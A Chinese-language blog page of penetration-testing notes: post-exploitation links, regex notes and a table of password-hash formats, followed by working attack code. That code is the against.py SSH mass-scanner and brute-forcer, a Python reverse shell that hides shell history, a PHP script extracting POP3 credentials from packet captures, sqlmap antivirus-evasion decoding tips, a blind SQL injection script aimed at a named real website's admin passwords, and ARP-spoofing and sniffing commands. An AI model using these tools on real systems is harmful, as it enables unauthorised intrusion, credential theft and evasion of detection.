room362.com 的后期渗透思路:room362.com

linux/UNIX/BSD 的后期渗透思路: http://bit.ly/pqJxA5

windows 的后期渗透思路:http://bit.ly/lem7gvG

OSX 的后期渗透思路:http://bit.ly/leR3cbz

Metasploit 的后期渗透思路:http://bit.ly/JpJ1TR

 

http://blog.csdn.net/lxcnn/article/details/4304754

(?<=Expression) 逆序肯定环视,表示所在位置左侧能够匹配Expression

(?<!Expression) 逆序否定环视,表示所在位置左侧不能匹配Expression

(?=Expression) 顺序肯定环视,表示所在位置右侧能够匹配Expression

(?!Expression) 顺序否定环视,表示所在位置右侧不能匹配Expression

环视是正则中的一个难点,对于环视的理解,可以从应用和原理两个角度理解,如果想理解得更清晰、深入一些,还是从原理的角度理解好一些,正则匹配基本原理参考 NFA引擎匹配原理。

上面提到环视相当于对“所在位置”附加了一个条件,环视的难点在于找到这个“位置”,这一点解决了,环视也就没什么秘密可言了。

顺序环视匹配过程

对于顺序肯定环视(?=Expression)来说,当子表达式Expression匹配成功时,(?=Expression)匹配成功,并报告(?=Expression)匹配当前位置成功。

对于顺序否定环视(?!Expression)来说,当子表达式Expression匹配成功时,(?!Expression)匹配失败;当子表达式Expression匹配失败时,(?!Expression)匹配成功,并报告(?!Expression)匹配当前位置成功;

来源:wooyun.org

系统:DES(Unix)

例子: IvS7aeT4NzQPM

说明:Linux或者其他linux内核系统中

长度: 13 个字符

描述:第1、2位为salt,例子中的’Iv’位salt,后面的为hash值

系统:MD5(Unix)

例子:$1$12345678$XM4P3PrKBgKNnTaqG9P0T/

说明:Linux或者其他linux内核系统中

长度:34个字符

描述:开始的$1$位为加密标志,后面8位12345678为加密使用的salt,后面的为hash

加密算法:2000次循环调用MD5加密

举例:

密文:$1$73$aCtXgEDmSyXAyRHJ.87e.0

明文:r9n3d2p6

unix系的md5 crypt算法,$1$作标示用,73是salt,aCtXgEDmSyXAyRHJ.87e.0 就是salt过的hash

linux下用openssl命令可以复现,具体命令:openssl passwd -1 -salt 73 r9n3d2p6

php里可以用这个函数 http://php.net/manual/en/function.crypt.php

cmd5好像只支持8位salt的md5 crypt,所以想破解的话只能自己用JTR啥的跑了,好在是md5,很快的。

系统:SHA-512(Unix)

例子:$6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm

说明:Linux或者其他linux内核系统中

长度: 13 个字符

描述:开始的$6$位为加密标志,后面8位为salt,后面的为hash

加密算法:5000次的SHA-512加密

系统:SHA-256(Unix)

例子:$5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi

说明:Linux或者其他linux内核系统中

长度: 55 个字符

描述:开始的$5$位为加密标志,后面8位为salt,后面的为hash

加密算法:5000次的SHA-256加密

系统:MD5(APR)

例子:$apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.

说明:Linux或者其他linux内核系统中

长度:37个字符

描述:开始的$apr1$位为加密标志,后面8位为salt,后面的为hash

加密算法:2000次循环调用MD5加密

—————–windows——————————————

系统:windows

例子:Admin:b474d48cdfc4974d86ef4d24904cdd91

长度:98个字符

加密算法:MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))

——————mysql——————————————–

系统:mysql

例子:606717496665bcba

说明:老版本的MySql中

长度:8字节(16个字符)

说明:包括两个字节,且每个字的值不超过0x7fffffff

系统:MySQL5

例子:*E6CC90B878B948C35E92B003C792C46C58C4AF40

说明:较新版本的MySQL

长度:20字节(40位)

加密算法:SHA-1(SHA-1($pass))

——————其他系统———————————————

系统:MD5(WordPress)

例子:$P$B123456780BhGFYSlUqGyE6ErKErL01

说明:WordPress使用的md5

长度:34个字符

描述:$P$表示加密类型,然后跟着一位字符,经常是字符‘B’,后面是8位salt,后面是就是hash

加密算法:8192次md5循环加密

系统:MD5(phpBB3)

说明:phpBB 3.x.x.使用

例子:$H$9123456785DAERgALpsri.D9z3ht120

长度:34个字符

描述:开始的$H$为加密标志,后面跟着一个字符,一般的都是字符‘9’,然后是8位salt,然后是hash 值

加密算法:2048次循环调用MD5加密

系统:RAdmin v2.x

说明:Remote Administrator v2.x版本中

例子:5e32cceaafed5cc80866737dfb212d7f

长度:16字节(32个字符)

加密算法:字符用0填充到100字节后,将填充过后的字符经过md5加密得到(32位值)

————————md5加密——————————————–

标准MD5

例子:c4ca4238a0b923820dcc509a6f75849b

使用范围:phpBB v2.x, Joomla 的 1.0.13版本前,及其他cmd

长度:16个字符

其他的加salt及变形类似:

md5($pass.$salt)

例子: 6f04f0d75f6870858bae14ac0b6d9f73:1234

md5($salt.$pass)

例子:f190ce9ac8445d249747cab7be43f7d5:12

md5(md5($pass))

例子:28c8edde3d61a0411511d3b1866f0636

md5(md5($pass).$salt)

例子:6011527690eddca23580955c216b1fd2:wQ6

md5(md5($salt).md5($pass))

例子: 81f87275dd805aa018df8befe09fe9f8:wH6_S

md5(md5($salt).$pass)

例子: 816a14db44578f516cbaef25bd8d8296:1234

md5($salt.$pass.$salt)

例子: a3bc9e11fddf4fef4deea11e33668eab:1234

md5($salt.md5($salt.$pass))

例子: 1d715e52285e5a6b546e442792652c8a:1234

来源:https://github.com/nullsecuritynet/tools/blob/master/cracker/against/release/against.py

#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
#                ____                     _ __                                 #
#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
#    / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /                           #
#   /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /                            #
#                                            /___/ team                        #
#                                                                              #
# against.py - mass scanning and brute-forcing script for ssh                  #
#                                                                              #
# FILE                                                                         #
# against.py                                                                   #
#                                                                              #
# DATE                                                                         #
# 2014-02-27                                                                   #
#                                                                              #
# DESCRIPTION                                                                  #
# 'against.py' is a very fast ssh attacking script which includes a            #
# multithreaded port scanning module (tcp connect) for discovering possible    #
# targets and a multithreaded brute-forcing module which attacks               #
# parallel all discovered hosts or given ip addresses from a list.             #
#                                                                              #
# AUTHOR                                                                       #
# pgt - http://www.nullsecurity.net/                                           #
#                                                                              #
# TODO                                                                         #
# - keyboard-interactive handler                                               #
# - scan ip address ranges randomly                                            #
#                                                                              #
# CHANGELOG                                                                    #
# v0.2                                                                         #
# - prints kernel version after login                                          #
# - optimized timings when cracking                                            #
# - detection for key authentication                                           #
# - false positive / small honeypot detection                                  #
# - save found target ip addresses to file, -O option                          #
# - 127.x.x.x will be excluded when scanning for random ip addresses           #
# - unsort found target ip addresses, because of sequential port scanning      #
# - resolve ip address by given hostname                                       #
# - stop attacks on target when keyboard-interactive is required               #
# - set threads for port scanning, -s option                                   #
#                                                                              #
################################################################################


from socket import *
import multiprocessing
import threading
import time
import paramiko
import sys
import os
import logging
import argparse
import random
import re


# version of against.py
VERSION = 'v0.2'


# print our nice banner ;)
def banner():
    print '--==[ against.py by [email protected] ]==--'

# print version
def version():
    print '[+] against.py %s' % (VERSION)
    sys.exit(0)

# check if we can write to file
def test_file(filename):
    try:
        outfile = open(filename, 'a')
        outfile.close()
    except IOError:
        print '[!] ERROR: cannot write to file \'%s\'' % filename
        sys.exit(1)

# define command line parameters and help page
def argspage():
    parser = argparse.ArgumentParser(
    usage = '\n\n   ./%(prog)s -i <arg> | -r <arg> | -I <arg>',
    formatter_class = argparse.RawDescriptionHelpFormatter,
    epilog =
    'examples:\n\n'

    '  attack single target\n'
    '  usage: ./%(prog)s -i nsa.gov -L passwords.txt\n\n'

    '  scanning and attacking an ip-range\n'
    '  usage: ./%(prog)s -i 192.168.0-10.1-254 -u admin -l troll -s 500',
    add_help = False
    )

    options = parser.add_argument_group('options', '')
    options.add_argument('-i', default=False, metavar='<ip/range>',
            help='ip address/ip range/domain (e.g.: 192.168.0-3.1-254)')
    options.add_argument('-I', default=False, metavar='<file>',
            help='list of targets')
    options.add_argument('-r', default=False, metavar='<num>',
            help='attack random hosts')
    options.add_argument('-p', default=22, metavar='<num>',
            help='port number of sshd (default: 22)')
    options.add_argument('-t', default=4, metavar='<num>',
            help='threads per host (default: 4)')
    options.add_argument('-f', default=8, metavar='<num>',
            help='attack max hosts parallel (default: 8)')
    options.add_argument('-u', default='root', metavar='<username>',
            help='single username (default: root)')
    options.add_argument('-U', default=False, metavar='<file>',
            help='list of usernames')
    options.add_argument('-l', default='toor', metavar='<password>',
            help='single password (default: toor)')
    options.add_argument('-L', default=False, metavar='<file>',
            help='list of passwords')
    options.add_argument('-o', default=False, metavar='<file>',
            help='write found logins to file')
    options.add_argument('-O', default=False, metavar='<file>',
            help='write found target ip addresses to file')
    options.add_argument('-s', default=200, metavar='<num>',
            help='threads when port scanning (default: 200)')
    options.add_argument('-T', default=3, metavar='<sec>',
            help='timeout in seconds (default: 3)')
    options.add_argument('-V', action='store_true',
            help='print version of against.py and exit')

    args = parser.parse_args()

    if args.V:
        version()

    if (args.i == False) and (args.I == False) and (args.r == False):
        print ''
        parser.print_help()
        sys.exit(0)

    return args

# write found ip addresses / logins to file
def write_to_file(filename, text):
    outfile = open(filename, 'a')
    outfile.write(text)
    outfile.close()

# connect to target and checks for an open port
def scan(target, port, timeout, oips):
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(timeout)
    result = sock.connect_ex((target, port))
    sock.close()
    if result == 0:
        HOSTLIST.append(target)
        if oips:
            write_to_file(oips, target + '\n')

# control the maximum number of threads
def active_threads(threads, waittime):
    while threading.activeCount() > threads:
        time.sleep(waittime)

# create thread and call scan()
def thread_scan(args, target):
    port = int(args.p)
    timeout = float(args.T)
    oips = args.O
    threads = int(args.s)

    bam = threading.Thread(target=scan, args=(target, port, timeout, oips))
    bam.start()

    active_threads(threads, 0.0001)
    time.sleep(0.001)

# only the output when scanning for targets
def scan_output(i):
    sys.stdout.flush()
    sys.stdout.write('\r[*] hosts scanned: {0} | ' \
            'possible to attack: {1}'.format(i, len(HOSTLIST)))

# handle format of given target(s)
def check_targets(targets):
    if re.match(r'^[0-9.\-]*$', targets):
        return targets
    try:
        target = gethostbyname(targets)
        return target
    except gaierror:
        print '[-] \'%s\' is unreachable' % (targets)
        finished()
        sys.exit(1)

# unsort found hosts, because of incremental scanning
def unsort_hostlist():
    print '[*] unsort host list'
    for i in range(15):
        random.shuffle(HOSTLIST)

# handle ip range format from command line
def handle_ip_range(iprange):
    parted = tuple(part for part in iprange.split('.'))

    rsa = range(4)
    rsb = range(4)
    for i in range(4):
        hyphen = parted[i].find('-')
        if hyphen != -1:
            rsa[i] = int(parted[i][:hyphen])
            rsb[i] = int(parted[i][1+hyphen:]) + 1
        else:
            rsa[i] = int(parted[i])
            rsb[i] = int(parted[i]) + 1

    return (rsa, rsb)

# call thread_scan() with target ip addresses
def ip_range(args):
    targets = check_targets(args.i)
    rsa, rsb = handle_ip_range(targets)

    print '[*] scanning %s for ssh services' % targets
    counter = 0
    for i in range(rsa[0], rsb[0]):
        for j in range(rsa[1], rsb[1]):
            for k in range(rsa[2], rsb[2]):
                for l in range(rsa[3], rsb[3]):
                    target = '%d.%d.%d.%d' % (i, j, k, l)
                    counter += 1
                    scan_output(counter)
                    thread_scan(args, target)

    # waiting for the last running threads
    active_threads(1, 0.1)

    scan_output(counter)
    print '\n[*] finished scan'

# create ip addresses
def randip():
    rand = range(4)
    for i in range(4):
        rand[i] = random.randrange(0, 256)

    # exclude 127.x.x.x
    if rand[0] == 127:
        randip()

    ipadd = '%d.%d.%d.%d' % (rand[0], rand[1], rand[2], rand[3])
    return ipadd

# create random ip addresses
def rand_ip(args):
    i = 0
    print '[*] scanning random ips for ssh services'
    while len(HOSTLIST) < int(args.r):
        i += 1
        scan_output(i)
        thread_scan(args, randip())

    # waiting for the last running threads
    active_threads(1, 1)

    scan_output(i)
    print '\n[*] finished scan.'

# checks if given filename by parameter exists
def file_exists(filename):
    try:
        open(filename).readlines()
    except IOError:
        print '[!] ERROR: cannot open file \'%s\'' % filename
        sys.exit(1)

# read-in a file with ip addresses
def ip_list(ipfile):
    file_exists(ipfile)
    targets = open(ipfile).readlines()
    for target in targets:
        HOSTLIST.append(target)

# connect to target and try to login
def crack(target, port, user, passwd, outfile, timeo, i):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    user = user.replace('\n', '')
    passwd = passwd.replace('\n', '')
    try:
        ssh.connect(target, port=port, username=user, password=passwd,
                timeout=timeo, pkey=None, allow_agent=False)
        time.sleep(3)
        try:
            ssh.exec_command('unset HISTFILE ; unset HISTSIZE')
            time.sleep(1)
            ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a ' \
                    '|| cat /proc/version')
            output = 'kernel: %s' \
                    % (ssh_stdout.readlines()[0].replace('\n', ''))
        except:
            output = 'info: maybe a honeypot or false positive'
        login = '[+] login found for %s | %s:%s\n' \
                '[!] %s' % (target, user, passwd, output)
        print login
        if outfile:
            write_to_file(outfile, login + '\n')
        ssh.close()
        os._exit(0)
    except paramiko.AuthenticationException, e:
        ssh.close()
        exception = str(e)
        if '[\'publickey\']' in exception:
            print '[-] key authentication only - ' \
                'stopped attack against %s' % (target)
            os._exit(1)
        elif '\'keyboard-interactive\'' in exception:
            print '[-] %s requires \'keyboard-interactive\' handler' % (target)
            os._exit(1)
    except:
        ssh.close()
        # after 3 timeouts per request the attack against $target will stopped
        if i < 3:
            i += 1
            # reconnect after random seconds (between 0.6 and 1.2 sec)
            randtime = random.uniform(0.6, 1.2)
            time.sleep(randtime)
            crack(target, port, user, passwd, outfile, timeo, i)
        else:
            print '[-] too many timeouts - stopped attack against %s' % (target)
            os._exit(1)

# create 'x' number of threads and call crack()
def thread_it(target, args):
    port = int(args.p)
    user = args.u
    userlist = args.U
    password = args.l
    passlist = args.L
    outfile = args.o
    timeout = float(args.T)
    threads = int(args.t)

    if userlist:
        users = open(userlist).readlines()
    else:
        users = [user]
    if passlist:
        passwords = open(passlist).readlines()
    else:
        passwords = [password]

    # try/except looks dirty but we need it :/
    try:
        for user in users:
            for password in passwords:
                Run = threading.Thread(target=crack, args=(target, port, user,
                    password, outfile, timeout, 0,))
                Run.start()
                # checks that we a max number of threads
                active_threads(threads, 0.01)
                time.sleep(0.1)
        # waiting for the last running threads
        active_threads(1, 1)
    except KeyboardInterrupt:
        os._exit(1)

# create 'x' child processes (child == cracking routine for only one target)
def fork_it(args):
    threads = int(args.t)
    childs = int(args.f)
    len_hosts = len(HOSTLIST)

    print '[*] attacking %d target(s)\n' \
            '[*] cracking up to %d hosts parallel\n' \
            '[*] threads per host: %d' % (len_hosts, childs, threads)

    i = 1
    for host in HOSTLIST:
        host = host.replace('\n', '')
        print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts)
        hostfork = multiprocessing.Process(target=thread_it, args=(host, args))
        hostfork.start()
        # checks that we have a max number of childs
        while len(multiprocessing.active_children()) >= childs:
            time.sleep(0.001)
        time.sleep(0.001)
        i += 1

    # waiting for child processes
    while multiprocessing.active_children():
        time.sleep(1)

# \(0.o)/
def empty_hostlist():
    if len(HOSTLIST) == 0:
        print '[-] found no targets to attack!'
        finished()
        sys.exit(1)

# output when against.py finished all routines
def finished():
    print '[*] game over!!!'

def main():
    banner()
    args = argspage()

    if args.U:
        file_exists(args.U)
    if args.L:
        file_exists(args.L)
    if args.o:
        test_file(args.o)
    if args.O:
        test_file(args.O)

    if args.i:
        ip_range(args)
        unsort_hostlist()
    elif args.I:
        ip_list(args.I)
    else:
        rand_ip(args)

    time.sleep(0.1)
    empty_hostlist()
    fork_it(args)
    finished()

if __name__ == '__main__':
    HOSTLIST = []
    try:
        logging.disable(logging.CRITICAL)
        main()
    except KeyboardInterrupt:
        print '\nbye bye!!!'
        time.sleep(0.2)
        os._exit(1)

来源:https://github.com/dairoot/Shell-rebound/blob/master/back.py
http://www.mksec.net/nc.py

# -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
back connect py version,only linux have pty module
code by google security team
"""
import sys,os,socket,pty
shell = "/bin/sh"
def usage(name):
    print 'python reverse connector'
    print 'usage: %s <ip_addr> <port>' % name

def main():
    if len(sys.argv) !=3:
        usage(sys.argv[0])
        sys.exit()
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((sys.argv[1],int(sys.argv[2])))
        print 'connect ok'
    except:
        print 'connect faild'
        sys.exit()
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    global shell
    os.unsetenv("HISTFILE")
    os.unsetenv("HISTFILESIZE")
    os.unsetenv("HISTSIZE")
    os.unsetenv("HISTORY")
    os.unsetenv("HISTSAVE")
    os.unsetenv("HISTZONE")
    os.unsetenv("HISTLOG")
    os.unsetenv("HISTCMD")
    os.putenv("HISTFILE",'/dev/null')
    os.putenv("HISTSIZE",'0')
    os.putenv("HISTFILESIZE",'0')
    pty.spawn(shell)
    s.close()

if __name__ == '__main__':
    main()
<?php
$f=file_get_contents('pop3.cap');
preg_match_all('#CAPA.*?(USER\x20[[:upper:][:lower:][:punct:]][email protected]).*?(PASS\x20[[:alnum:][:punct:]]+).*?STAT#ism',$f,$m);
list($user,$pass)=array($m[1],$m[2]);
$user=array_unique($user);
foreach ($user as $key => $u) {
        echo "--------------------#$key#--------------".PHP_EOL;
        echo $u.PHP_EOL;
        echo $pass[$key].PHP_EOL;
}
?>

以上实例 过滤出 @gmail.com 的用户密码 如需过滤出如 @163.com 请替换之

当然 也可以在抓取数据包的同时 grep 过滤出相关字符…
或使用 tshark wireshak 之类的工具 查找相关字符串

sqlmap 中 自带 的shell 以及一些 二进制 文件 不能直接使用的
因为防止被误杀 都经过异或 方式编码了的
所幸sqlmap 自带解码工具
目录
./sqlmap/extra/cloak/cloak.py

如 lib_mysqludf_sys.dll (比较喜欢用 sqlmap 里面的 udf 不容易被杀掉)

cloak.py -d -i D:\sqlmap\udf\mysql\windows\64\lib_mysqludf_sys.dll_
解码之后便可直接使用了

shell 也一样

支持转换文件 及 字符串
string hex 互转脚本

<?php
$options = getopt('d:e:x:');
if(empty($options)){
        echo <<<EOT
        code by lostwolf :)
Usage:
  $argv[0] -e encode [String or File]  strtohex  
  $argv[0] -d decode [String or File]  hextostr
  $argv[0] -x encode [String or File]  strtoxcode                                
EOT;
echo PHP_EOL;
}

if($options[d]){
        echo hextostr($options[d]) .PHP_EOL;
}

if($options[e]){
        echo strtohex($options[e]) .PHP_EOL;
}
if($options[x]){
        echo strtoxcode($options[x]) .PHP_EOL;
}

function strtohex($field) { 
        if(is_file($field)){
                $field=file_get_contents($field);
        }

  $s=''; 
  foreach(str_split($field) as $c) $s.=sprintf("%02X",ord($c)); 
  return ($s); 
}

function strtoxcode($field) {
                if(is_file($field)){
                $field=file_get_contents($field);
        }
 $field=bin2hex($field);
 $field=chunk_split($field,2,"\\x");
 $field= "\\x" . substr($field,0,-2);
 return  $field;
}

function hextostr($field) { 
        if(is_file($field)){
                $x=file_get_contents($field);
        }
        if(preg_match('#^[[:xdigit:]]{2,}$#i' , $field)){
     $s=''; 
  foreach(explode("\n",trim(chunk_split($field,2))) as $h) $s.=chr(hexdec($h)); 
    return  ($s);
        }
        
        if(preg_match('#^(?:\\\x[[:xdigit:]]{2})+$#i' , $field)){
     return eval("echo \"$field\";");
        }
        
        else{
        exit('Input Error!'.PHP_EOL);
        }
  
} 

?>

hex.bat 放入环境变量目录

@echo off
color a
php C:\gnu\bin\hex.php %*
<?php

//$sCharset = 'etaoinshrdlcumwfgypbvkjxqz@';
 $sCharset ='ABCDEF0123456789';
 
/* for every character */
for ($i=0, $result=''; $i<32; ++$i) {
        $ch = $sCharset;
 
        do {
                $ch1 = substr($ch, 0, intval(strlen($ch)/2));
                $ch2 = substr($ch, intval(strlen($ch)/2));
                
                //$p = $sPost.' OR 1=(SELECT 1 FROM blight WHERE password REGEXP \'^'.$result.'['.$ch1.']\' AND sessid=xxx) AND \'1\'=\'1';
                 //$payload= "AND ORD(mid(lower(user()),$i,1))= ".ord($p);
                //$p='or 1=(select CURRENT_USER()  REGEXP \'^'.$result.'['.$ch1.']\') and 1=1';
                //201.56.23.45' AND ORD(MID((SELECT HEX(IFNULL(CAST(CHAR_LENGTH(HEX(IFNULL(CAST(password AS CHAR),0x20))) AS CHAR),0x20)) FROM phfirst.`system_user` ORDER BY `user` LIMIT 2,1),4,1))>50#
                //$p='or 1=(select `password`  FROM phfirst.`system_user`  where user=\'admin\' and hex(`password`) REGEXP \'^'.$result.'['.$ch1.']\') and 1=1';
                $p='or 1=(select case when (select hex(password) from phfirst.`system_user` where user=\'admin\')'  .'REGEXP \'^'.$result.'['.$ch1.']\'' .'THEN 1 ELSE 0 end) and 1=1';
                
                //echo $p.PHP_EOL;
                $res = mycurl('http://www.phfirst.com.tw/mrtg.php',$p);
 
                if (strpos($res, 'mysql_fetch_array') === false)
                        $ch = $ch1;
                else 
                        $ch = $ch2;
                
        } while (strlen($ch) > 1);
        
        $result .= $ch;
       echo "\rresult: ".$result;
}


/* 获取长度
$payload= " And (select length(user()))=14 ";
	$contents= mycurl('http://www.phfirst.com.tw/mrtg.php',$payload);
echo 	$contents;
*/


function mycurl($url,$str){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url) ;  
curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0');
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Requested-With: XMLHttpRequest','CLIENT-IP: 201.56.23.45\''.' '.$str.'#'));//构造IP  
//curl_setopt($ch, CURLOPT_PROXY,'127.0.0.1:8081');
curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8081');  //http代理
//curl_setopt($ch, CURLOPT_PROXY, 'socks5://127.0.0.1:1080');  //socks5代理
//curl_setopt($ch, CURLOPT_PROXYTYPE,'CURLPROXY_HTTP');
curl_setopt($ch,CURLOPT_DNS_CACHE_TIMEOUT,86400); //DNS 缓存一天
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);//字符串的形式返回
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);//是否302跳转
curl_setopt($ch,CURLOPT_TIMEOUT,10);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,15);
$ret = curl_exec($ch);
curl_close($ch);
return $ret;
}

arp 欺骗

arpspoof.exe /l 列出网络接口
arpspoof.exe 192.168.3.1 192.168.3.5 80 0 1

嗅探:

tcpdump -D //查看网络接口
tcpdump -i 3 -w h.cap -s 0

-s0 表示取消抓包长度限制
否则会导致抓包不全!
win 下的 tcpdump 好处就是 无需安装wincap 纯命令行下操作
杀软不会干掉

随后便可用 wireshark 分析数据包

相关工具下载:嗅探

Post Navigation